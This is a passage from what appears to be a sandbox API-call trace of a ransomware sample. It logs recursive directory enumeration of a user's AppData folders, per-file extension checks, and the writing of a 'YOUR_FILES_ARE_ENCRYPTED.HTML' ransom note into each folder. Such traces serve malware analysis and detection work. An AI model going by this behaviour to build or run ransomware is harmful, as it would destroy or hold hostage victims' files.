cAlternateFileName="")) returned 1 [0163.598] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | 
out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa389d570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa389d570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0163.598] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live") returned 60 [0163.598] GetProcessHeap () returned 0x270000 [0163.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.598] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live" [0163.598] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\*" [0163.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa389d570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa389d570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.599] FindNextFileW (in: 
hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa389d570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa389d570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.599] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Bici", cAlternateFileName="")) returned 1 [0163.599] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici") returned 65 [0163.599] GetProcessHeap () returned 0x270000 [0163.599] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.600] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici" [0163.600] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*" [0163.600] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.600] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.600] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad51fbf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad51fbf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad51fbf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x60, cFileName="_00.sqm", cAlternateFileName="")) returned 1 [0163.600] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\_00.sqm") returned 73 [0163.600] lstrcmpW (lpString1="_00.sqm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.600] PathFindExtensionW (pszPath="_00.sqm") returned=".sqm" [0163.600] lstrlenW (lpString=".sqm") returned 4 [0163.600] 
PathFindExtensionW (pszPath="_00.sqm") returned=".sqm" [0163.600] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad75b090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad75b090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad75b090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x338, dwReserved0=0x0, dwReserved1=0x60, cFileName="_01.sqm", cAlternateFileName="")) returned 1 [0163.600] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\_01.sqm") returned 73 [0163.601] lstrcmpW (lpString1="_01.sqm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.601] PathFindExtensionW (pszPath="_01.sqm") returned=".sqm" [0163.601] lstrlenW (lpString=".sqm") returned 4 [0163.601] PathFindExtensionW (pszPath="_01.sqm") returned=".sqm" [0163.601] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae89d010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xae89d010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae89d010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="_02.sqm", cAlternateFileName="")) returned 1 [0163.601] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\_02.sqm") returned 73 [0163.601] lstrcmpW (lpString1="_02.sqm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.601] PathFindExtensionW (pszPath="_02.sqm") returned=".sqm" [0163.601] lstrlenW (lpString=".sqm") returned 4 [0163.601] PathFindExtensionW 
(pszPath="_02.sqm") returned=".sqm" [0163.601] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae89d010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xae89d010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae89d010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="_02.sqm", cAlternateFileName="")) returned 0 [0163.601] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.601] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0163.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows live\\bici\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.602] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.605] CloseHandle (hObject=0x58c) returned 1 [0163.605] GetProcessHeap () returned 0x270000 [0163.606] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.606] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Bici", cAlternateFileName="")) returned 0 [0163.606] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.607] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0163.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.607] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.610] CloseHandle (hObject=0x4a8) returned 1 [0163.610] GetProcessHeap () returned 0x270000 [0163.611] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.611] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd484f930, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd484f930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0163.611] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail") returned 60 [0163.611] GetProcessHeap () returned 0x270000 [0163.611] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.611] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail" [0163.611] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\*" [0163.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd484f930, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd484f930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.614] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd484f930, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd484f930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.614] FindNextFileW (in: 
hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned 116 [0163.615] lstrcmpW (lpString1="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.615] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0163.615] lstrlenW (lpString=".oeaccount") returned 10 [0163.615] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0163.615] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows 
Mail\\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned 116 [0163.615] lstrcmpW (lpString1="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.615] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0163.615] lstrlenW (lpString=".oeaccount") returned 10 [0163.615] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0163.615] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x858aaee7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned 116 [0163.615] lstrcmpW (lpString1="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.615] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0163.615] lstrlenW (lpString=".oeaccount") returned 10 [0163.615] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0163.615] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd4875a90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Backup", cAlternateFileName="")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 67 [0163.615] GetProcessHeap () returned 0x270000 [0163.615] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.615] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" [0163.615] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*" [0163.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4875a90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.616] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4875a90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.616] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="old", cAlternateFileName="")) returned 1 [0163.616] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned 71 [0163.616] GetProcessHeap () returned 0x270000 [0163.616] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.616] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" [0163.616] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*" [0163.616] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.616] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.617] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82c554d6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0163.617] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 84 [0163.617] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.617] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.617] lstrlenW 
